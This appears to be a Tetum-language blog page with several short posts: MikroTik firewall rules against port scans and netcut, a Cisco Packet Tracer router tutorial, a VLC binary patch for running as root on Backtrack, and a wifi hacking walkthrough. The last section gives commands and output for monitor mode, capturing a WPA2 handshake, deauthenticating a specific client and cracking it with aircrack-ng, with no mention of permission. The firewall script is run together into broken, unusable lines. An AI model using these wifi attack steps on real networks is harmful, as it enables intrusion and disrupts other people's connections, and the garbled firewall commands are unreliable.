AKTIVIDADE

Aktividade Koko NanoStation Iha Baucau Ho Infotimor






Script Defende Rede Ho Router Mikrotik



MikroTik hanesan route ida nebe bele bele simu rede ke boot, ho funsaun mak hanesan maneja bandwidth, ip firewall, web proxy, loadbalancing server.
Hau sei hatudu scrip balu nebe proteje ita nia rede wainhira ita uja mikrotik husi port nebe ema atu scan ou cliente balu hakarak uja netcut hodi hakotu rede.
Scrip hirak ne ita copy deit ba ita nia route terminal….. Hau senti scrip ne'e fasil atu proteje ita nia rede iha fatin nebe dt... 

Script mak ne'e :

/ip firewall filteradd action=add-src-to-address-list address-list=DDOS address-list-timeout=15s \ chain=input comment="" disabled=no dst-port=1337 protocol=tcpadd action=add-src-to-address-list address-list=DDOS address-list-timeout=15m \ chain=input comment="" disabled=no dst-port=7331 protocol=tcpadd action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w \ chain=input comment="Port scanners to list " disabled=no protocol=tcp psd=21,3s,3,1add action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w \ chain=input comment="SYN/FIN scan" disabled=no protocol=tcp tcp-flags=fin,synadd action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w \ chain=input comment="SYN/RST scan" disabled=no protocol=tcp tcp-flags=syn,rstadd action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w \ chain=input  disabled=no tcp-flags=fin,psh,urg,!syn,!rst,!ack protocol=tcp \ comment="FIN/PSH/URG scan"add action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w \ chain=input disabled=no protocol=tcp tcp-flags=fin,syn,rst,psh,ack,urg \add action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w \ chain=input  tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg comment="NMAP NULL scan" \ disabled=no protocol=tcpadd action=add-src-to-address-list address-list="port scanners" address-list-timeout=2w \ chain=input comment="NMAP FIN Stealth scan" disabled=no protocol=tcpadd action=drop chain=input  src-address-list="port scanners"add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 \ protocol=tcp src-address=61.213.183.1-61.213.183.254add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 \ protocol=tcp src-address=67.195.134.1-67.195.134.254add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 \ protocol=tcp src-address=68.142.233.1-68.142.233.254add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 \ protocol=tcp src-address=68.180.217.1-68.180.217.254add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 \ protocol=tcp src-address=203.84.204.1-203.84.204.254add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 \ protocol=tcp src-address=69.63.176.1-69.63.176.254add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 \ protocol=tcp src-address=69.63.181.1-69.63.181.254add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 \ protocol=tcp src-address=63.245.209.1-63.245.209.254add action=accept chain=input comment="ANTI NETCUT" disabled=no dst-port=0-65535 \ protocol=tcp src-address=63.245.213.1-63.245.213.254





















Cisco

Mai Estuda hamutuk konaba Cisco Packet Tracer

Oinsa atu fahe rede uja route ba Lan A no Lan B


  1. Loke Cisco .
    cisco
    desenu.1 
    1. Ok.diak nia sei mosu tuir mai nee..

      Ok.diak nia sei mosu tuir mai nee..
      desenu.2




      1. Ita sie hili komponentu nebe mak ita uja mak hanesan :

      → komputador
      → router



      desenu.3




        4. Agora Ita klik dala rua ba router... → tab CLI

      ita setting uluk ba Lan A.

      nia interfaca fa 0/0 ip mak : 192.168.0.1 net mask 255.255.255.0
      router>
      router>
      router>enable
      router#conf t
      router#interface fa 0/0
      router#ip address 192.168.0.1 255.255.255.0
      router#no shutdown
      router#exit (sai husi configura fa 0/0)
      router>exit (sai husi configura terminal)
      router>write (rai = save)
      router>exit (taka configura)



      Oinsa ita bo'o sira kria fali ba Lan B....??????????

      …..TPC?????



        5. Nia resultadu ikus liu mak sai hanesan ne'e.....!!!!



      desenu..4

Vlc






Maluk sira uja ona sistema operativu linux seluk hanesan linuxmint, ubuntu, fedora, no seluk-seluk tan karik instal vlc media player ona karik iha Backtrack ita ita perija troka buat balu husi vlc nia file.....

Pasu permeiro loke terminal ou console husi ita nia komputador


sudo apt-get isntall vlc
depois ita loke folder vlc

ho manda ou commad
hexedit /usr/bin/vlc
sei mosu hanesan dejenu iha kraik ne'e


depois hanesan tab iha keyboard
ctrl + s hodi buka liafuan geteuid troka ba getppeid
ctrl + x
depois  y hodi taka...
ok... maluk sira bele koko..!!!!!!!!!!

Tool's Hacking

Oinsa atu uja Backtrack halo actividade Hacking nia 

1.Loke terminal uluk atu cheking kartu jaringan ita nia
#iwconfig 
=> lo        no wireless extensions.
=> eth0      no wireless extensions.
=> wlan0     IEEE 802.11bgn  ESSID:"TOSC"  
      Mode:Managed  Frequency:2.412 GHz  Access Point: 00:02:6F:8D:49:C4   
      Bit Rate=54 Mb/s   Tx-Power=14 dBm   
      Retry  long limit:7   RTS thr:off   Fragment thr:off
      Encryption key:off
      ower Management:off
     Link Quality=57/70  Signal level=-53 dBm  
     Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
     Tx excessive retries:0  Invalid misc:399   Missed beacon:0

2. Ketik airmon-ng

#airmon-ng start wlan0
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
536 avahi-daemon
537 NetworkManager
538 avahi-daemon
605 wpa_supplicant
19204 dhclient
Process with PID 19204 (dhclient) is running on interface wlan0
Interface Chipset Driver
mon1 Atheros ath9k - [phy0]
mon0 Atheros ath9k - [phy0]
wlan0 Atheros ath9k - [phy0]
(monitor mode enabled on mon4)
3. Koko airodump-ng mon0 para scan wifi sira besik 
#airodump-ng mon0
CH  1 ][ Elapsed: 17 s ][ 2013-03-09 08:08                                        
                                                                                 
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                        
 06:02:6F:8D:49:C4  -49      168        0      0     1  54 . WPA2 CCMP   PSK  forum@     
 00:02:6F:8D:49:C4  -46      172       79     6     1  54 . WPA2 CCMP   PSK  TOSC       
                                                                                     
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes     
                                                                                   
 00:02:6F:8D:49:C4  90:4C:E5:06:21:51    0   54 -54      0       35                   
 00:02:6F:8D:49:C4  F0:7B:CB:84:65:74  -34   54 -54      0       28                   
 00:02:6F:8D:49:C4  00:13:02:C7:A9:A6  -39   54 -54      0       21                   
4. Uja nafatin airodump-ng
#airodump-ng -c (chanel) --bssid (mac Ap) -w (list) mon0
#airodump-ng -c 1 --bssid 00:02:6F:8D:49:C4 -w koko mon0 (hare mos nia kliente sira.)
 5. Uja aireplay-ng 
#aireplay-ng --deauth 200 -a 00:02:6F:8D:49:C4 -c  90:4C:E5:06:21:51 mon0
6. Uja aircrack-ng
# aircrack-ng koko-*.cap
Mai ita koko hamutuk........!@!@!@!@!!!!!!!!!